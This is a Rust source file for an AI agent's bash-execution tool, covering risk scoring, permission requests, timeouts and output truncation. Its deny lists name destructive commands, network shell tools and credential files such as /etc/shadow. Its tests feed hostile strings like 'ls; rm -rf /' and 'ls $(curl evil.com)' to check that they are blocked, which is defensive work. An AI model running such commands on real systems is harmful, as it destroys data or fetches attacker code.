code_mesh_core/tool/bash.rs

1//! Enhanced Bash tool implementation
2//! Features secure process execution, timeout handling, cross-platform support, and command validation
3
4use async_trait::async_trait;
5use serde::Deserialize;
6use serde_json::{json, Value};
7use std::collections::HashMap;
8use std::path::{Path, PathBuf};
9use std::process::Stdio;
10use tokio::process::Command;
11use tokio::time::{timeout, Duration};
12use uuid::Uuid;
13use chrono::Utc;
14use cfg_if::cfg_if;
15
16use super::{Tool, ToolContext, ToolResult, ToolError};
17use super::permission::{RiskLevel, create_permission_request};
18
19/// Tool for executing bash/shell commands
20pub struct BashTool;
21
22#[derive(Debug, Deserialize)]
23struct BashParams {
24    command: String,
25    #[serde(default = "default_timeout")]
26    timeout: Option<u64>,
27    #[serde(default)]
28    description: Option<String>,
29    #[serde(default)]
30    environment: Option<HashMap<String, String>>,
31    #[serde(default)]
32    working_directory: Option<String>,
33}
34
/// Serde default for the `timeout` parameter: two minutes, expressed in milliseconds.
fn default_timeout() -> Option<u64> {
    const TWO_MINUTES_MS: u64 = 2 * 60 * 1_000;
    Some(TWO_MINUTES_MS)
}
38
/// Largest timeout a command may request, in milliseconds (ten minutes).
const MAX_TIMEOUT: u64 = 10 * 60 * 1_000;
/// Byte budget for combined stdout + stderr before the output is truncated.
const MAX_OUTPUT_LENGTH: usize = 30 * 1_000;
41
/// Program names treated as destructive or privileged. A match makes
/// `BashTool::assess_command_risk` rate the command as Critical.
const DANGEROUS_COMMANDS: &[&str] = &[
    // File and disk destruction
    "rm", "rmdir", "del", "format", "fdisk", "mkfs", "dd",
    // Power state
    "shutdown", "reboot", "halt", "init",
    // Process control
    "kill", "killall", "pkill",
    // Privilege and account changes
    "sudo", "su", "passwd", "chown", "chmod",
    // Mounts, services and firewalls
    "mount", "umount", "systemctl", "service", "iptables", "ufw", "firewall-cmd",
];
49
/// Package managers, build tools and infrastructure CLIs that change system or
/// project state. A match raises the assessment to at least Medium risk.
const SYSTEM_COMMANDS: &[&str] = &[
    // Package managers and build tools
    "apt", "yum", "dnf", "pacman", "brew", "pip", "npm", "yarn", "cargo",
    // Version control, containers and infrastructure
    "git", "docker", "kubectl", "terraform", "ansible",
];
55
56#[async_trait]
57impl Tool for BashTool {
58    fn id(&self) -> &str {
59        "bash"
60    }
61    
62    fn description(&self) -> &str {
63        "Execute shell commands with security controls and timeout handling"
64    }
65    
66    fn parameters_schema(&self) -> Value {
67        json!({
68            "type": "object",
69            "properties": {
70                "command": {
71                    "type": "string",
72                    "description": "The command to execute"
73                },
74                "timeout": {
75                    "type": "number",
76                    "description": "Optional timeout in milliseconds (max 600000ms / 10 minutes)",
77                    "minimum": 1000,
78                    "maximum": 600000
79                },
80                "description": {
81                    "type": "string",
82                    "description": "Clear, concise description of what this command does in 5-10 words"
83                },
84                "environment": {
85                    "type": "object",
86                    "description": "Additional environment variables",
87                    "additionalProperties": {
88                        "type": "string"
89                    }
90                },
91                "workingDirectory": {
92                    "type": "string",
93                    "description": "Working directory for the command (relative to session working directory)"
94                }
95            },
96            "required": ["command"]
97        })
98    }
99    
100    async fn execute(
101        &self,
102        args: Value,
103        ctx: ToolContext,
104    ) -> Result<ToolResult, ToolError> {
105        let params: BashParams = serde_json::from_value(args)
106            .map_err(|e| ToolError::InvalidParameters(e.to_string()))?;
107        
108        // Validate and analyze command
109        let risk_assessment = self.assess_command_risk(&params.command);
110        
111        // Security validation
112        self.validate_command_security(&params.command, &ctx)?;
113        
114        // Handle timeout validation
115        let timeout_ms = params.timeout.unwrap_or(120_000).min(MAX_TIMEOUT);
116        
117        // Determine working directory
118        let working_dir = if let Some(wd) = &params.working_directory {
119            let requested_dir = if PathBuf::from(wd).is_absolute() {
120                PathBuf::from(wd)
121            } else {
122                ctx.working_directory.join(wd)
123            };
124            
125            // Security check: ensure it's within the session working directory
126            if !requested_dir.starts_with(&ctx.working_directory) {
127                return Err(ToolError::PermissionDenied(
128                    "Working directory must be within session directory".to_string()
129                ));
130            }
131            
132            requested_dir
133        } else {
134            ctx.working_directory.clone()
135        };
136        
137        // Create permission request based on risk level
138        if risk_assessment.requires_permission {
139            let permission_request = create_permission_request(
140                Uuid::new_v4().to_string(),
141                ctx.session_id.clone(),
142                format!("Execute command: {}", 
143                    if params.command.len() > 50 { 
144                        format!("{}...", &params.command[..50]) 
145                    } else { 
146                        params.command.clone() 
147                    }
148                ),
149                risk_assessment.risk_level,
150                json!({
151                    "command": params.command,
152                    "description": params.description,
153                    "working_directory": working_dir.to_string_lossy(),
154                    "risk_factors": risk_assessment.risk_factors,
155                }),
156            );
157            
158            // In a full implementation, this would trigger permission checking
159            // For now, we'll allow medium risk commands but block high/critical
160            if matches!(risk_assessment.risk_level, RiskLevel::High | RiskLevel::Critical) {
161                return Err(ToolError::PermissionDenied(format!(
162                    "Command blocked due to security policy: {}",
163                    risk_assessment.risk_factors.join(", ")
164                )));
165            }
166        }
167        
168        // Execute the command
169        let execution_result = self.execute_command(
170            &params.command,
171            &working_dir,
172            timeout_ms,
173            &params.environment,
174            &ctx,
175        ).await?;
176        
177        // Process results
178        let output = self.format_output(&execution_result)?;
179        
180        // Calculate relative working directory for display
181        let relative_wd = working_dir
182            .strip_prefix(&ctx.working_directory)
183            .unwrap_or(&working_dir)
184            .to_string_lossy()
185            .to_string();
186        
187        let metadata = json!({
188            "command": params.command,
189            "description": params.description,
190            "exit_code": execution_result.exit_code,
191            "working_directory": relative_wd,
192            "timeout_ms": timeout_ms,
193            "stdout_bytes": execution_result.stdout.len(),
194            "stderr_bytes": execution_result.stderr.len(),
195            "truncated": execution_result.truncated,
196            "execution_time_ms": execution_result.execution_time_ms,
197            "risk_assessment": risk_assessment,
198            "timestamp": Utc::now().to_rfc3339(),
199        });
200        
201        // Check if command failed
202        if execution_result.exit_code != 0 {
203            return Err(ToolError::ExecutionFailed(format!(
204                "Command exited with code {}: {}",
205                execution_result.exit_code,
206                output
207            )));
208        }
209        
210        Ok(ToolResult {
211            title: params.description.unwrap_or_else(|| {
212                if params.command.len() > 50 {
213                    format!("{}...", &params.command[..50])
214                } else {
215                    params.command.clone()
216                }
217            }),
218            metadata,
219            output,
220        })
221    }
222}
223
224#[derive(Debug, Clone, serde::Serialize)]
225struct CommandRiskAssessment {
226    risk_level: RiskLevel,
227    requires_permission: bool,
228    risk_factors: Vec<String>,
229}
230
/// Captured outcome of a single shell invocation, before it is formatted for display.
#[derive(Debug)]
struct CommandExecutionResult {
    /// Standard output, lossily decoded as UTF-8 and possibly truncated.
    stdout: String,
    /// Standard error, lossily decoded as UTF-8 and possibly truncated.
    stderr: String,
    /// Exit status code, or -1 when the process reported none.
    exit_code: i32,
    /// Set when combined output exceeded `MAX_OUTPUT_LENGTH` and was cut down.
    truncated: bool,
    /// Elapsed wall-clock time, in milliseconds.
    execution_time_ms: u128,
}
239
240impl BashTool {
241    /// Assess the risk level of a command
242    fn assess_command_risk(&self, command: &str) -> CommandRiskAssessment {
243        let mut risk_factors = Vec::new();
244        let mut risk_level = RiskLevel::Low;
245        let mut requires_permission = false;
246        
247        let command_lower = command.to_lowercase();
248        let command_parts: Vec<&str> = command.split_whitespace().collect();
249        let base_command = command_parts.first().unwrap_or(&"").trim_start_matches("sudo ");
250        
251        // Check for dangerous commands
252        if DANGEROUS_COMMANDS.iter().any(|&cmd| base_command == cmd || base_command.ends_with(cmd)) {
253            risk_level = RiskLevel::Critical;
254            requires_permission = true;
255            risk_factors.push("Potentially destructive command".to_string());
256        }
257        
258        // Check for system modification commands
259        if SYSTEM_COMMANDS.iter().any(|&cmd| base_command == cmd || base_command.starts_with(cmd)) {
260            risk_level = risk_level.max(RiskLevel::Medium);
261            requires_permission = true;
262            risk_factors.push("System modification command".to_string());
263        }
264        
265        // Check for privilege escalation
266        if command_lower.contains("sudo") || command_lower.contains("su ") {
267            risk_level = RiskLevel::Critical;
268            requires_permission = true;
269            risk_factors.push("Privilege escalation detected".to_string());
270        }
271        
272        // Check for network operations
273        if command_lower.contains("curl") || command_lower.contains("wget") || 
274           command_lower.contains("nc ") || command_lower.contains("netcat") {
275            risk_level = risk_level.max(RiskLevel::Medium);
276            requires_permission = true;
277            risk_factors.push("Network operation".to_string());
278        }
279        
280        // Check for file operations with wildcards
281        if (command_lower.contains("rm ") || command_lower.contains("del ")) && 
282           (command_lower.contains("*") || command_lower.contains("?")) {
283            risk_level = RiskLevel::High;
284            requires_permission = true;
285            risk_factors.push("Bulk file deletion".to_string());
286        }
287        
288        // Check for shell operators that could be dangerous
289        if command.contains("&&") || command.contains("||") || command.contains(";") || 
290           command.contains("|") || command.contains(">") || command.contains(">>") {
291            risk_level = risk_level.max(RiskLevel::Medium);
292            risk_factors.push("Complex shell operation".to_string());
293        }
294        
295        CommandRiskAssessment {
296            risk_level,
297            requires_permission,
298            risk_factors,
299        }
300    }
301    
302    /// Validate command security
303    fn validate_command_security(&self, command: &str, _ctx: &ToolContext) -> Result<(), ToolError> {
304        // Block obviously malicious patterns
305        let malicious_patterns = [
306            "; rm -rf", "| rm -rf", "&& rm -rf", "|| rm -rf",
307            "$(curl", "$(wget", "`curl", "`wget",
308            "/etc/passwd", "/etc/shadow", 
309            "format c:", "del /f /s /q",
310        ];
311        
312        let command_lower = command.to_lowercase();
313        for pattern in &malicious_patterns {
314            if command_lower.contains(pattern) {
315                return Err(ToolError::PermissionDenied(format!(
316                    "Command contains potentially malicious pattern: {}",
317                    pattern
318                )));
319            }
320        }
321        
322        // Check command length
323        if command.len() > 4096 {
324            return Err(ToolError::InvalidParameters(
325                "Command too long (>4096 characters)".to_string()
326            ));
327        }
328        
329        Ok(())
330    }
331    
332    /// Execute the command with proper platform handling
333    async fn execute_command(
334        &self,
335        command: &str,
336        working_dir: &Path,
337        timeout_ms: u64,
338        environment: &Option<HashMap<String, String>>,
339        ctx: &ToolContext,
340    ) -> Result<CommandExecutionResult, ToolError> {
341        let start_time = std::time::Instant::now();
342        
343        // Build command based on platform
344        let mut cmd = self.create_platform_command(command);
345        
346        // Set working directory
347        cmd.current_dir(working_dir);
348        
349        // Set up stdio
350        cmd.stdout(Stdio::piped())
351           .stderr(Stdio::piped())
352           .stdin(Stdio::null());
353        
354        // Set environment variables
355        cmd.env("TERM", "xterm-256color");
356        cmd.env("FORCE_COLOR", "0"); // Disable colors in output
357        cmd.env("NO_COLOR", "1");
358        
359        if let Some(env) = environment {
360            for (key, value) in env {
361                // Validate environment variable names for security
362                if key.chars().all(|c| c.is_ascii_alphanumeric() || c == '_') {
363                    cmd.env(key, value);
364                }
365            }
366        }
367        
368        // Execute with timeout
369        let output = match timeout(Duration::from_millis(timeout_ms), cmd.output()).await {
370            Ok(Ok(output)) => output,
371            Ok(Err(e)) => {
372                return Err(ToolError::ExecutionFailed(format!("Command failed to start: {}", e)));
373            }
374            Err(_) => {
375                return Err(ToolError::ExecutionFailed(format!(
376                    "Command timed out after {} ms",
377                    timeout_ms
378                )));
379            }
380        };
381        
382        // Check abort signal
383        if *ctx.abort_signal.borrow() {
384            return Err(ToolError::Aborted);
385        }
386        
387        let execution_time = start_time.elapsed().as_millis();
388        
389        // Convert output to strings
390        let stdout = String::from_utf8_lossy(&output.stdout);
391        let stderr = String::from_utf8_lossy(&output.stderr);
392        
393        // Check if output needs truncation
394        let combined_length = stdout.len() + stderr.len();
395        let truncated = combined_length > MAX_OUTPUT_LENGTH;
396        
397        let (final_stdout, final_stderr) = if truncated {
398            let stdout_limit = MAX_OUTPUT_LENGTH * 3 / 4; // 75% for stdout
399            let stderr_limit = MAX_OUTPUT_LENGTH - stdout_limit;
400            
401            let truncated_stdout = if stdout.len() > stdout_limit {
402                format!("{}... (truncated)", &stdout[..stdout_limit])
403            } else {
404                stdout.to_string()
405            };
406            
407            let truncated_stderr = if stderr.len() > stderr_limit {
408                format!("{}... (truncated)", &stderr[..stderr_limit])
409            } else {
410                stderr.to_string()
411            };
412            
413            (truncated_stdout, truncated_stderr)
414        } else {
415            (stdout.to_string(), stderr.to_string())
416        };
417        
418        Ok(CommandExecutionResult {
419            stdout: final_stdout,
420            stderr: final_stderr,
421            exit_code: output.status.code().unwrap_or(-1),
422            truncated,
423            execution_time_ms: execution_time,
424        })
425    }
426    
427    /// Create platform-appropriate command
428    fn create_platform_command(&self, command: &str) -> Command {
429        cfg_if! {
430            if #[cfg(target_os = "windows")] {
431                let mut cmd = Command::new("cmd");
432                cmd.args(["/C", command]);
433                cmd
434            } else {
435                let mut cmd = Command::new("bash");
436                cmd.args(["-c", command]);
437                cmd
438            }
439        }
440    }
441    
442    /// Format the execution result into a readable output
443    fn format_output(&self, result: &CommandExecutionResult) -> Result<String, ToolError> {
444        let mut output_parts = Vec::new();
445        
446        if !result.stdout.is_empty() {
447            output_parts.push(format!("<stdout>\n{}\n</stdout>", result.stdout));
448        }
449        
450        if !result.stderr.is_empty() {
451            output_parts.push(format!("<stderr>\n{}\n</stderr>", result.stderr));
452        }
453        
454        if output_parts.is_empty() {
455            output_parts.push("(no output)".to_string());
456        }
457        
458        if result.truncated {
459            output_parts.push("\n(Output truncated due to length)".to_string());
460        }
461        
462        Ok(output_parts.join("\n"))
463    }
464}
465
466impl RiskLevel {
467    fn max(self, other: RiskLevel) -> RiskLevel {
468        match (self, other) {
469            (RiskLevel::Critical, _) | (_, RiskLevel::Critical) => RiskLevel::Critical,
470            (RiskLevel::High, _) | (_, RiskLevel::High) => RiskLevel::High,
471            (RiskLevel::Medium, _) | (_, RiskLevel::Medium) => RiskLevel::Medium,
472            (RiskLevel::Low, RiskLevel::Low) => RiskLevel::Low,
473        }
474    }
475}
476
#[cfg(feature = "wasm")]
mod wasm_impl {
    use super::*;

    impl BashTool {
        /// WASM stand-in for process execution: always fails, because no process can
        /// be spawned in this environment.
        ///
        /// `pub(super)` so the parent module's `Tool::execute` can call it. A private
        /// inherent method here would only be visible inside `wasm_impl`.
        pub(super) async fn execute_command(
            &self,
            _command: &str,
            _working_dir: &Path,
            _timeout_ms: u64,
            _environment: &Option<HashMap<String, String>>,
            _ctx: &ToolContext,
        ) -> Result<CommandExecutionResult, ToolError> {
            Err(ToolError::ExecutionFailed(
                "Command execution not supported in WASM environment".to_string()
            ))
        }
    }
}
496
#[cfg(test)]
mod tests {
    use super::*;

    /// Minimal context rooted at `/tmp`, with an abort signal that is never raised.
    fn test_context() -> ToolContext {
        ToolContext {
            session_id: "test".to_string(),
            message_id: "test".to_string(),
            abort_signal: tokio::sync::watch::channel(false).1,
            working_directory: PathBuf::from("/tmp"),
        }
    }

    #[test]
    fn test_risk_assessment() {
        let tool = BashTool;

        // (command, expected risk level, expected requires_permission)
        let cases = [
            ("ls -la", RiskLevel::Low, false),
            ("git clone https://github.com/user/repo", RiskLevel::Medium, true),
            ("rm -rf *.log", RiskLevel::High, true),
            ("sudo rm -rf /", RiskLevel::Critical, true),
        ];

        for (command, expected_level, expected_permission) in cases {
            let assessment = tool.assess_command_risk(command);
            assert_eq!(assessment.risk_level, expected_level, "risk level for {:?}", command);
            assert_eq!(
                assessment.requires_permission, expected_permission,
                "permission flag for {:?}",
                command
            );
        }
    }

    #[test]
    fn test_security_validation() {
        let tool = BashTool;
        let ctx = test_context();

        assert!(
            tool.validate_command_security("ls -la", &ctx).is_ok(),
            "safe command should pass"
        );

        // A chained deletion and a command-substitution download must both be rejected.
        for malicious in ["ls; rm -rf /", "ls $(curl evil.com)"] {
            assert!(
                tool.validate_command_security(malicious, &ctx).is_err(),
                "{:?} should be rejected",
                malicious
            );
        }
    }
}